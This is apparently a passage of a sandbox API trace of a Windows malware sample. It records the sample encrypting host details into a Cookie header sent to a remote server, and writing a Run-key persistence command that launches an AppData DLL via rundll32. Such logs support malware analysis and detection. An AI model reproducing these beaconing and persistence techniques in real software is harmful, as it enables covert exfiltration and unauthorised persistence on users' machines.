dwFlags=0x0 | out: phAlgorithm=0x2cf6cc) returned 0x0 [0145.943] GetProcessHeap () returned 0x530000 [0145.944] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x530000) returned 1 [0145.944] GetProcessHeap () returned 0x530000 [0145.944] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5aca10 | out: hHeap=0x530000) returned 1 [0145.944] GetProcessHeap () returned 0x530000 [0145.944] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x592518 [0145.944] BCryptImportKeyPair (in: hAlgorithm=0x5d3058, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x58c05c, pbInput=0x551bc0, cbInput=0x48, dwFlags=0x0 | out: phKey=0x58c05c) returned 0x0 [0145.946] GetProcessHeap () returned 0x530000 [0145.946] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x592518 | out: hHeap=0x530000) returned 1 [0145.946] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5d3058, dwFlags=0x0 | out: hAlgorithm=0x5d3058) returned 0x0 [0145.946] GetProcessHeap () returned 0x530000 [0145.947] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551bc0 | out: hHeap=0x530000) returned 1 [0145.947] GetProcessHeap () returned 0x530000 [0145.947] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551c10 | out: hHeap=0x530000) returned 1 [0145.947] GetProcessHeap () returned 0x530000 [0145.947] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x230) returned 0x5bdad8 [0145.948] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0x111c) returned 0x102 [0150.326] GetProcessHeap () returned 0x530000 [0150.326] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5ad838 [0150.326] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0150.326] GetProcessHeap () returned 0x530000 [0150.326] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ad838 | out: hHeap=0x530000) returned 1 [0150.326] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0150.326] GetProcessHeap () returned 0x530000 [0150.326] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5ad838 [0150.326] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0150.326] GetProcessHeap () returned 0x530000 [0150.326] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ad838 | out: hHeap=0x530000) returned 1 [0150.326] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77a1389e, dwReserved1=0x530138, cFileName=".", cAlternateFileName="")) returned 0x5a7100 [0150.327] FindNextFileW (in: hFindFile=0x5a7100, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77a1389e, dwReserved1=0x530138, cFileName="..", cAlternateFileName="")) returned 1 [0150.327] FindNextFileW (in: hFindFile=0x5a7100, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x77a1389e, dwReserved1=0x530138, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0150.327] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0150.327] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0150.327] FindNextFileW (in: hFindFile=0x5a7100, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x77a1389e, dwReserved1=0x530138, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0150.328] FindClose (in: hFindFile=0x5a7100 | out: hFindFile=0x5a7100) returned 1 [0150.328] lstrlenA (lpString="Q9IATRKPRH_8443A5AF") returned 19 [0150.328] RtlGetVersion (in: lpVersionInformation=0x2cf6c0 | out: lpVersionInformation=0x2cf6c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0150.328] GetNativeSystemInfo (in: lpSystemInfo=0x2cf69c | out: lpSystemInfo=0x2cf69c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0150.329] GetCurrentProcessId () returned 0xe20 [0150.329] ProcessIdToSessionId (in: dwProcessId=0xe20, pSessionId=0x2cf7c4 | out: pSessionId=0x2cf7c4) returned 1 [0150.329] GetProcessHeap () returned 0x530000 [0150.329] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x5afeb0 [0150.329] GetProcessHeap () returned 0x530000 [0150.329] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5ad838 [0150.329] GetProcessHeap () returned 0x530000 [0150.329] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5ac938 [0150.329] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0150.330] GetProcessHeap () returned 0x530000 [0150.330] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ad838 | out: hHeap=0x530000) returned 1 [0150.330] GetProcessHeap () returned 0x530000 [0150.330] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5ac938 | out: hHeap=0x530000) returned 1 [0150.330] GetProcessHeap () returned 0x530000 [0150.330] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x59a0b8 [0150.330] BCryptGetProperty (in: hObject=0x5bee00, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0150.330] GetProcessHeap () returned 0x530000 [0150.331] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x59a0b8 | out: hHeap=0x530000) returned 1 [0150.331] GetProcessHeap () returned 0x530000 [0150.331] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x5bed18 [0150.331] BCryptCreateHash (in: hAlgorithm=0x5bee00, phHash=0x2cf4ac, pbHashObject=0x5bed18, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5bee00, phHash=0x2cf4ac, pbHashObject=0x5bed18) returned 0x0 [0150.331] BCryptHashData (in: hHash=0x5bed20, pbInput=0x5afeb0, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x5bed20) returned 0x0 [0150.331] BCryptFinishHash (in: hHash=0x5bed20, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x5bed20, pbOutput=0x2cf5e0) returned 0x0 [0150.331] BCryptDestroyHash (in: hHash=0x5bed20 | out: hHash=0x5bed20) returned 0x0 [0150.331] GetProcessHeap () returned 0x530000 [0150.331] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5bed18 | out: hHeap=0x530000) returned 1 [0150.331] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5bee00, dwFlags=0x0 | out: hAlgorithm=0x5bee00) returned 0x0 [0150.331] GetProcessHeap () returned 0x530000 [0150.331] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x58bf30 [0150.331] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf30, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0150.331] GetProcessHeap () returned 0x530000 [0150.331] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x58bf98 [0150.331] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x58bf30, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x58bf98, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x58bf98, pcbResult=0x2cf4b4) returned 0x0 [0150.331] GetProcessHeap () returned 0x530000 [0150.331] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x104) returned 0x5bed18 [0150.332] GetProcessHeap () returned 0x530000 [0150.332] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf98 | out: hHeap=0x530000) returned 1 [0150.332] GetProcessHeap () returned 0x530000 [0150.332] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58bf30 | out: hHeap=0x530000) returned 1 [0150.332] CryptBinaryToStringW (in: pbBinary=0x5bed18, cbBinary=0x104, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0150.332] GetProcessHeap () returned 0x530000 [0150.332] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2ba) returned 0x5bee28 [0150.332] CryptBinaryToStringW (in: pbBinary=0x5bed18, cbBinary=0x104, dwFlags=0x40000001, pszString=0x5bee28, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTsU2RtRX1QCBpX0g2YfFg0M5CM9GkFu68UnTsRGbuyX21ezstlqz39UdGaePLzxharY1EFJQGr7B0ah6ygxH1F26ruLX/U886wNQn7PbJP4o/cVmUP/2cknIW+MTk67tDhMzSnM=", pcchString=0x2cf504) returned 1 [0150.332] GetProcessHeap () returned 0x530000 [0150.332] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0150.332] GetProcessHeap () returned 0x530000 [0150.333] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x592518 [0150.333] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: XbfvQTT=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTsU2RtRX1QCBpX0g2YfFg0M5CM9GkFu68UnTsRGbuyX21ezstlqz39UdGaePLzxharY1EFJQGr7B0ah6ygxH1F26ruLX/U886wNQn7PbJP4o/cVmUP/2cknIW+MTk67tDhMzSnM=\r\n") returned 366 [0150.333] GetProcessHeap () returned 0x530000 [0150.333] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x592518 | out: hHeap=0x530000) returned 1 [0150.333] GetProcessHeap () returned 0x530000 [0150.333] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5bee28 | out: hHeap=0x530000) returned 1 [0150.333] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) [0150.561] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="dtioahMnMKoQxLcPlTW", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0153.741] GetProcessHeap () returned 0x530000 [0153.741] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0153.741] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0153.741] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0153.741] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0153.742] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: XbfvQTT=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTsU2RtRX1QCBpX0g2YfFg0M5CM9GkFu68UnTsRGbuyX21ezstlqz39UdGaePLzxharY1EFJQGr7B0ah6ygxH1F26ruLX/U886wNQn7PbJP4o/cVmUP/2cknIW+MTk67tDhMzSnM=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) [0177.289] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0177.307] GetProcessHeap () returned 0x530000 [0177.307] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x5a6d40 [0177.307] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",mZTS") returned 94 [0177.307] GetProcessHeap () returned 0x530000 [0177.308] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5a6d40 | out: hHeap=0x530000) returned 1 [0177.308] GetProcessHeap () returned 0x530000 [0177.308] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0177.308] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x604, lpdwDisposition=0x0) returned 0x0 [0177.309] GetProcessHeap () returned 0x530000 [0177.309] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0177.309] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",mZTS") returned 94 [0177.309] RegSetValueExW (in: hKey=0x604, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",mZTS", cbData=0xbe | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",mZTS") returned 0x0 [0177.310] RegCloseKey (hKey=0x604) returned 0x0 [0177.311] GetProcessHeap () returned 0x530000 [0177.311] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bee0c8 | out: hHeap=0x530000) returned 1 [0177.311] GetProcessHeap () returned 0x530000 [0177.311] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5afeb0 | out: hHeap=0x530000) returned 1 [0177.311] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe8889) returned 0x102 [0187.413] GetProcessHeap () returned 0x530000 [0187.413] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8a68 [0187.414] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0187.414] GetProcessHeap () returned 0x530000 [0187.414] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8a68 | out: hHeap=0x530000) returned 1 [0187.414] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0187.414] GetProcessHeap () returned 0x530000 [0187.414] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8a68 [0187.414] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0187.414] GetProcessHeap () returned 0x530000 [0187.414] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8a68 | out: hHeap=0x530000) returned 1 [0187.414] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x5a6d40 [0187.416] FindNextFileW (in: hFindFile=0x5a6d40, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0187.416] FindNextFileW (in: hFindFile=0x5a6d40, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0187.417] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0187.417] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0187.417] FindNextFileW (in: hFindFile=0x5a6d40, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0187.417] FindClose (in: hFindFile=0x5a6d40 | out: hFindFile=0x5a6d40) returned 1 [0187.417] GetProcessHeap () returned 0x530000 [0187.417] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x5afeb0 [0187.418] GetProcessHeap () returned 0x530000 [0187.418] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x5e8a68 [0187.418] GetProcessHeap () returned 0x530000 [0187.418] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cce68 [0187.418] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0187.420] GetProcessHeap () returned 0x530000 [0187.420] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e8a68 | out: hHeap=0x530000) returned 1 [0187.420] GetProcessHeap () returned 0x530000 [0187.420] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cce68 | out: hHeap=0x530000) returned 1 [0187.420] GetProcessHeap () returned 0x530000 [0187.420] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x5e92a0 [0187.420] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0187.420] GetProcessHeap () returned 0x530000 [0187.421] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5e92a0 | out: hHeap=0x530000) returned 1 [0187.421] GetProcessHeap () returned 0x530000 [0187.421] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0187.421] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0187.421] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x5afeb0, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0187.421] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0187.421] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0187.421] GetProcessHeap () returned 0x530000 [0187.422] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0187.422] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0187.422] GetProcessHeap () returned 0x530000 [0187.422] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0187.422] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0187.422] GetProcessHeap () returned 0x530000 [0187.422] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0187.422] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf4b4) returned 0x0 [0187.422] GetProcessHeap () returned 0x530000 [0187.422] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x109) returned 0x2a49848 [0187.423] GetProcessHeap () returned 0x530000 [0187.423] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0187.423] GetProcessHeap () returned 0x530000 [0187.424] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0187.424] CryptBinaryToStringW (in: pbBinary=0x2a49848, cbBinary=0x109, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0187.424] GetProcessHeap () returned 0x530000 [0187.424] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2ca) returned 0x2a89708 [0187.424] CryptBinaryToStringW (in: pbBinary=0x2a49848, cbBinary=0x109, dwFlags=0x40000001, pszString=0x2a89708, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTg7ShOeHr6DQPQAKptliKRzfEvT+Rki5Uu9yC5IjvqCahzx6gm8VuGV+imURRqAfqGaG8OoRH3WkPVYzP2uzj/tUVcOyKoHCG4iHQ73bI/5gMYHEBHRjDV4Y9daRCfWS55+2ll3tC6B1iA==", pcchString=0x2cf504) returned 1 [0187.424] GetProcessHeap () returned 0x530000 [0187.424] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0187.424] GetProcessHeap () returned 0x530000 [0187.424] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x5e9278 [0187.425] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: MkmwigRR=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTg7ShOeHr6DQPQAKptliKRzfEvT+Rki5Uu9yC5IjvqCahzx6gm8VuGV+imURRqAfqGaG8OoRH3WkPVYzP2uzj/tUVcOyKoHCG4iHQ73bI/5gMYHEBHRjDV4Y9daRCfWS55+2ll3tC6B1iA==\r\n") returned 375 [0187.425] GetProcessHeap () returned 0x530000 [0187.425] HeapFree (in: hHeap=0x530000, dwFlags=0x0, 